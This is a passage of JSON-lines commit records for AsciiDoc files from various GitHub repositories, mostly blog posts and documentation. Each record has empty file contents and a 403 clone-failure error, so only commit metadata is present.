2016-06-02-Word-Press-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-02-Word-Press-2.adoc","new_file":"_posts\/2016-06-02-Word-Press-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"44a10cd8488a1a3f4298efd0b4e097ff38a597fa","subject":"Update 2018-09-04-vr-comic.adoc","message":"Update 2018-09-04-vr-comic.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-04-vr-comic.adoc","new_file":"_posts\/2018-09-04-vr-comic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6c48ca011dbaed8655f8253c198b4d7f90e28c0","subject":"Update 2016-06-10-programming-study.adoc","message":"Update 2016-06-10-programming-study.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-10-programming-study.adoc","new_file":"_posts\/2016-06-10-programming-study.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa7140f39a81a53be78d40002b875e79383cea9b","subject":"Fixes documentation glitch","message":"Fixes documentation glitch\n\nresolves #827\n","repos":"cbornet\/springfox,kevinconaway\/springfox,kevinconaway\/springfox,vmarusic\/springfox,thomsonreuters\/springfox,namkee\/springfox,maksimu\/springfox,cbornet\/springfox,zorosteven\/springfox,arshadalisoomro\/springfox,arshadalisoomro\/springfox,namkee\/springfox,thomsonreuters\/springfox,springfox\/springfox,yelhouti\/springfox,wjc133\/springfox,springfox\/springfox,vmarusic\/springfox,jlstrater\/springfox,acourtneybrown\/springfox,springfox\/springfox,choiapril6\/springfox,maksimu\/springfox,thomasdarimont\/springfox,zhiqinghuang\/springfox,wjc133\/springfox,izeye\/springfox,cbornet\/springfox,thomasdarimont\/springfox,choiapril6\/springfox,wjc133\/springfox,kevinconaway\/springfox,izeye\/springfox,yelhouti\/springfox,RobWin\/springfox,namkee\/springfox,erikthered\/springfox,erikthered\/springfox,thomasdarimont\/springfox,choiapril6\/springfox,springfox\/springfox,zorosteven\/springfox,zorosteven\/springfox,acourtneybrown\/springfox,vmarusic\/springfox,izeye\/springfox,yelhouti\/springfox,zhiqinghuang\/springfox,acourtneybrown\/springfox,zhiqinghuang\/springfox,RobWin\/springfox,erikthered\/springfox,arshadalisoomro\/springfox,maksimu\/springfox,jlstrater\/springfox,thomsonreuters\/springfox,RobWin\/springfox,jlstrater\/springfox","old_file":"asciidoc\/current-documentation.adoc","new_file":"asciidoc\/current-documentation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/springfox\/springfox.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0ff657c1b82b1d943c888528151bf9fb967869a5","subject":"Add blog post on using OpenSSL","message":"Add blog post on using OpenSSL\n","repos":"stuartwdouglas\/wildfly.org,stuartwdouglas\/wildfly.org,stuartwdouglas\/wildfly.org,stuartwdouglas\/wildfly.org","old_file":"news\/2017-10-06-OpenSSL-Support-In-Wildfly.adoc","new_file":"news\/2017-10-06-OpenSSL-Support-In-Wildfly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stuartwdouglas\/wildfly.org.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"68cbfc3f963a3cbde4008e7945a1a45b42ad5bd6","subject":"Create 2019-12-09-forge-3.9.5.final.asciidoc","message":"Create 2019-12-09-forge-3.9.5.final.asciidoc","repos":"forge\/docs,forge\/docs","old_file":"news\/2019-12-09-forge-3.9.5.final.asciidoc","new_file":"news\/2019-12-09-forge-3.9.5.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"3a6c85956aac0f86d89f1f1efdd8ae11732aef70","subject":"new release post","message":"new release post\n","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain","old_file":"src\/docs\/030_news\/2021\/2.0.3-release.adoc","new_file":"src\/docs\/030_news\/2021\/2.0.3-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ea8d0e032edadcc6e857dba18b0f3bcd6b65085","subject":"added readme","message":"added readme\n","repos":"teacurran\/java-experiments,teacurran\/java-experiments","old_file":"wildfly-jms-cluster\/README.adoc","new_file":"wildfly-jms-cluster\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/teacurran\/java-experiments.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d7169359b0bccceccc58d14510aaceaf33fb785f","subject":"Update 2016-09-23-wtf-log.adoc","message":"Update 2016-09-23-wtf-log.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-23-wtf-log.adoc","new_file":"_posts\/2016-09-23-wtf-log.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ea386dad975ae707299bc04469aa6861d6aee25","subject":"Update 2017-11-23-Azure-8.adoc","message":"Update 2017-11-23-Azure-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-23-Azure-8.adoc","new_file":"_posts\/2017-11-23-Azure-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d7782e7cb53835b6aa674bf90690336229b13f1d","subject":"Update 2018-08-21-absence.adoc","message":"Update 2018-08-21-absence.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-08-21-absence.adoc","new_file":"_posts\/2018-08-21-absence.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5cab7da4b723a4e7fa6f8927982f54c9fd5f2414","subject":"MAN page of the phpreflect(1) command","message":"MAN page of the phpreflect(1) command\n","repos":"remicollet\/php-reflect,llaville\/php-reflect","old_file":"docs\/phpreflect.1.asciidoc","new_file":"docs\/phpreflect.1.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remicollet\/php-reflect.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"689e9502e62bbe56e45322aaeca36d1959fed72f","subject":"Added release notes for Camel 2.17.2 to docs","message":"Added release notes for Camel 2.17.2 to docs\n","repos":"DariusX\/camel,davidkarlsen\/camel,apache\/camel,tadayosi\/camel,tdiesler\/camel,christophd\/camel,sverkera\/camel,christophd\/camel,sverkera\/camel,objectiser\/camel,tdiesler\/camel,ullgren\/camel,sverkera\/camel,kevinearls\/camel,cunningt\/camel,ullgren\/camel,pmoerenhout\/camel,cunningt\/camel,kevinearls\/camel,mcollovati\/camel,jamesnetherton\/camel,CodeSmell\/camel,adessaigne\/camel,anoordover\/camel,onders86\/camel,onders86\/camel,kevinearls\/camel,tadayosi\/camel,gnodet\/camel,nikhilvibhav\/camel,tdiesler\/camel,alvinkwekel\/camel,jamesnetherton\/camel,adessaigne\/camel,adessaigne\/camel,gnodet\/camel,zregvart\/camel,onders86\/camel,punkhorn\/camel-upstream,alvinkwekel\/camel,Fabryprog\/camel,nicolaferraro\/camel,alvinkwekel\/camel,sverkera\/camel,pmoerenhout\/camel,pmoerenhout\/camel,mcollovati\/camel,nikhilvibhav\/camel,adessaigne\/camel,objectiser\/camel,davidkarlsen\/camel,CodeSmell\/camel,DariusX\/camel,nicolaferraro\/camel,pax95\/camel,apache\/camel,adessaigne\/camel,CodeSmell\/camel,pax95\/camel,alvinkwekel\/camel,pax95\/camel,zregvart\/camel,zregvart\/camel,Fabryprog\/camel,jamesnetherton\/camel,apache\/camel,pax95\/camel,jamesnetherton\/camel,objectiser\/camel,onders86\/camel,kevinearls\/camel,adessaigne\/camel,CodeSmell\/camel,cunningt\/camel,tadayosi\/camel,Fabryprog\/camel,mcollovati\/camel,nikhilvibhav\/camel,davidkarlsen\/camel,onders86\/camel,onders86\/camel,christophd\/camel,tadayosi\/camel,apache\/camel,pmoerenhout\/camel,ullgren\/camel,DariusX\/camel,cunningt\/camel,apache\/camel,Fabryprog\/camel,nicolaferraro\/camel,sverkera\/camel,punkhorn\/camel-upstream,cunningt\/camel,christophd\/camel,sverkera\/camel,pmoerenhout\/camel,davidkarlsen\/camel,mcollovati\/camel,pmoerenhout\/camel,kevinearls\/camel,DariusX\/camel,objectiser\/camel,pax95\/camel,tdiesler\/camel,gnodet\/camel,christophd\/camel,anoordover\/camel,tadayosi\/camel,tdiesler\/camel,pax95\/camel,jamesnetherton\/camel,cunningt\/camel,apache\/camel,anoordover\/camel,punkhorn\/camel-upstream,anoordover\/camel,nikhilvibhav\/camel,kevinearls\/camel,punkhorn\/camel-upstream,nicolaferraro\/camel,anoordover\/camel,jamesnetherton\/camel,tdiesler\/camel,zregvart\/camel,gnodet\/camel,tadayosi\/camel,ullgren\/camel,christophd\/camel,gnodet\/camel,anoordover\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2172-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2172-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9e0009c7c029f48b23609c7729a662ad130332eb","subject":"Update 2015-02-20-Mistaken-Million.adoc","message":"Update 2015-02-20-Mistaken-Million.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2015-02-20-Mistaken-Million.adoc","new_file":"_posts\/2015-02-20-Mistaken-Million.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1658498d0fa6cb1d9727d6d889361aea4d921180","subject":"Update 2016-6-26-PHPER-array-merge.adoc","message":"Update 2016-6-26-PHPER-array-merge.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-26-PHPER-array-merge.adoc","new_file":"_posts\/2016-6-26-PHPER-array-merge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"22d6bbe4e96cb759c3207aea207a78c29db2d850","subject":"Update 2017-09-06-Generate-SSH-Key.adoc","message":"Update 2017-09-06-Generate-SSH-Key.adoc","repos":"alimasyhur\/alimasyhur.github.io,alimasyhur\/alimasyhur.github.io,alimasyhur\/alimasyhur.github.io,alimasyhur\/alimasyhur.github.io","old_file":"_posts\/2017-09-06-Generate-SSH-Key.adoc","new_file":"_posts\/2017-09-06-Generate-SSH-Key.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alimasyhur\/alimasyhur.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b132b0d8ee9c3b5c7c5f26402ada4639a3afa64","subject":"Renamed '_posts\/2017-08-22.adoc' to '_posts\/2017-05-22.adoc'","message":"Renamed '_posts\/2017-08-22.adoc' to '_posts\/2017-05-22.adoc'","repos":"SRTjiawei\/SRTjiawei.github.io,SRTjiawei\/SRTjiawei.github.io,SRTjiawei\/SRTjiawei.github.io,SRTjiawei\/SRTjiawei.github.io","old_file":"_posts\/2017-05-22.adoc","new_file":"_posts\/2017-05-22.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SRTjiawei\/SRTjiawei.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef4347bdae99ef5e72fc861e81f0317b2294fc32","subject":"Renamed '_posts\/2016-02-04-Inception.adoc' to '_posts\/2016-01-01-Inception.adoc'","message":"Renamed '_posts\/2016-02-04-Inception.adoc' to '_posts\/2016-01-01-Inception.adoc'","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-01-01-Inception.adoc","new_file":"_posts\/2016-01-01-Inception.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18bf2d73f26d5cdebe297c6960d8d00d5007a7e2","subject":"Update 2019-04-22-Cloud-Run.adoc","message":"Update 2019-04-22-Cloud-Run.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-04-22-Cloud-Run.adoc","new_file":"_posts\/2019-04-22-Cloud-Run.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d979e6dd4535c7a84c3db6140082fa11a0b758f","subject":"Worked on documentation.","message":"Worked on documentation.\n","repos":"libyal\/winreg-kb,libyal\/winreg-kb,Acidburn0zzz\/winreg-kb","old_file":"documentation\/Application Compatibility Cache key.asciidoc","new_file":"documentation\/Application Compatibility Cache key.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Acidburn0zzz\/winreg-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c391a6fe8e7e99cef0cb88ab3e99b1c559e98e13","subject":"Update 2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","message":"Update 2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","new_file":"_posts\/2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d66fc1e3a90bccc696c275fc356c8c04538b88a7","subject":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","message":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05e74a14124fb121eb75c230a8e7fdc4289398c3","subject":"Commit deletion for userguide\/tutorials\/aws-single-ami.adoc","message":"Commit deletion for userguide\/tutorials\/aws-single-ami.adoc\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/aws-single-ami.adoc","new_file":"userguide\/tutorials\/aws-single-ami.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f6017dfe7a1fe28dd43491ae5b3b82045559961d","subject":"Update 2016-06-10-programming-study.adoc","message":"Update 2016-06-10-programming-study.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-10-programming-study.adoc","new_file":"_posts\/2016-06-10-programming-study.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27f6f89988bbd0df13ec2c85d04704941656b1d4","subject":"Much details about Papyrus auto install","message":"Much details about Papyrus auto install\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Dev tools\/Automated Eclipse install.adoc","new_file":"Dev tools\/Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc6cbf0c9f44f16f3573b64f8eb1187584226287","subject":"Create file","message":"Create file","repos":"XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4","old_file":"xill-web-service\/tmp-test\/delete-worker\/http-request.adoc","new_file":"xill-web-service\/tmp-test\/delete-worker\/http-request.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/XillioQA\/xill-platform-3.4.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"55e011de9ef2326452375b1d8a7e46126005e4a0","subject":"Update 2016-03-30-Analisis-Paquetes.adoc","message":"Update 2016-03-30-Analisis-Paquetes.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Analisis-Paquetes.adoc","new_file":"_posts\/2016-03-30-Analisis-Paquetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18bfdd824f2792f3cc764f957ce6afd2d0ad9d8e","subject":"Update 2019-02-01-g-R-P-C-Java-Ruby.adoc","message":"Update 2019-02-01-g-R-P-C-Java-Ruby.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-01-g-R-P-C-Java-Ruby.adoc","new_file":"_posts\/2019-02-01-g-R-P-C-Java-Ruby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39cbe65b50cd7a6a268af1f069bc3dc2060795c8","subject":"added","message":"added\n","repos":"m-m-m\/orient","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/m-m-m\/orient.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c8b511c20f63353363f14a43015c48acf72f2c44","subject":"Ex JUnit","message":"Ex JUnit\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Divers\/JUnit.adoc","new_file":"Divers\/JUnit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37efd0ddf80f31b51e01c7e2ed746943c2cc7d9e","subject":"Wording","message":"Wording\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Best practices\/Various.adoc","new_file":"Best practices\/Various.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60ed0366a6f8e521ad17360fe6b1ed5a111302a8","subject":"Update 2015-11-08-Ihr-seid-gefragt.adoc","message":"Update 2015-11-08-Ihr-seid-gefragt.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-11-08-Ihr-seid-gefragt.adoc","new_file":"_posts\/2015-11-08-Ihr-seid-gefragt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90038be041339bf9898076c20c483c73b6cd1ebc","subject":"Some notes","message":"Some notes\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"d398337d15e074f01d1adbb8a610dcbf989d15a4","subject":"Update 2014-04-18-Engaged-Invention.adoc","message":"Update 2014-04-18-Engaged-Invention.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2014-04-18-Engaged-Invention.adoc","new_file":"_posts\/2014-04-18-Engaged-Invention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ff6c519a2d1e184115ff6ebbe74062706796ea6","subject":"Update 2013-12-10-jboss-eap-62-51-43-javaee-supported.adoc","message":"Update 2013-12-10-jboss-eap-62-51-43-javaee-supported.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2013-12-10-jboss-eap-62-51-43-javaee-supported.adoc","new_file":"_posts\/2013-12-10-jboss-eap-62-51-43-javaee-supported.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8a2187098e48477e5984644184f920aa543bd4f0","subject":"Planning","message":"Planning\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Course Object\/Planning.adoc","new_file":"Course Object\/Planning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1827e58d2eb88ce61376a511f75cd2186103948e","subject":"Deadline eclipse","message":"Deadline eclipse\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Exercice bis.adoc","new_file":"Dev tools\/Exercice bis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9f0e835568b07990730a243028adcac16d6d23d","subject":"added readme","message":"added readme\n","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"infinispan\/infinispan-remote\/readme.adoc","new_file":"infinispan\/infinispan-remote\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0fe39c9689345ef8581168fe489c4bf0f0903655","subject":"Update 2016-12-07-Back-Date-This.adoc","message":"Update 2016-12-07-Back-Date-This.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2016-12-07-Back-Date-This.adoc","new_file":"_posts\/2016-12-07-Back-Date-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c442a4ff123f54583bae3f3fe60eb239b4675bf","subject":"Update 2017-08-21-.adoc","message":"Update 2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a39e7ab1ade09b70801933ad3452ce12dba9a89","subject":"Update 2017-11-12-.adoc","message":"Update 2017-11-12-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-12-.adoc","new_file":"_posts\/2017-11-12-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"279062995a1525a610c7f4e70afee4d010bd759d","subject":"Update 2017-05-04-Test.adoc","message":"Update 2017-05-04-Test.adoc","repos":"dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru","old_file":"_posts\/2017-05-04-Test.adoc","new_file":"_posts\/2017-05-04-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dsp25no\/blog.dsp25no.ru.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"175f117030c86504251b1e7018add100a1a64aa4","subject":"Update 2018-02-23-test.adoc","message":"Update 2018-02-23-test.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-test.adoc","new_file":"_posts\/2018-02-23-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f4fc0c50fdf7f38cad70975037cbb40e85b9f61","subject":"Update 2015-09-14-.adoc","message":"Update 2015-09-14-.adoc","repos":"whelamc\/life,whelamc\/life,whelamc\/life","old_file":"_posts\/2015-09-14-.adoc","new_file":"_posts\/2015-09-14-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/whelamc\/life.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"013f2d3f594cc389f206a0f7a8a7c3b27dbdc517","subject":"Update 2017-12-03-.adoc","message":"Update 2017-12-03-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-03-.adoc","new_file":"_posts\/2017-12-03-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 